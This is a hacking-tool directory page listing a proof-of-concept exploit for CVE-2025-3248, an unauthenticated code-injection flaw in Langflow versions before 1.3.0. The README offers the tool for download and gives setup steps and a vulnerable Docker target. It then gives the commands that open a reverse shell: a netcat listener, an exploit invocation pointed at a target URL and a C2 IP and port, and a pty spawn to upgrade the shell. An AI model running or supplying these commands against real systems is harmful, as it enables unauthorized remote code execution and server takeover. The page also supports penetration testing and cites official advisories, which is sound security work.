Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-3248 — PoC for achieving RCE in Langflow versions <1.3.0 | Kitploit
Tools/GitHubGitHub/wand3rlust/cve-2025-3248
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

PoC for achieving RCE in Langflow versions <1.3.0

View Repository
7 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-3248

Introduction

Langflow versions prior to 1.3.0 are susceptible to unauthenticated code injection in the /api/v1/validate/code endpoint via Python exec() function. This exploit establishes a reverse shell connection abusing this vulnerability.

Usage

Configuration

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

Vuln App

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

Run

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

E.g.: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

NOTE: In order to upgrade the shell to TTY, execute below command after getting the shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Demo

Demo

References

  • Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • Original Exploit: https://www.exploit-db.com/exploits/52262
Download Tool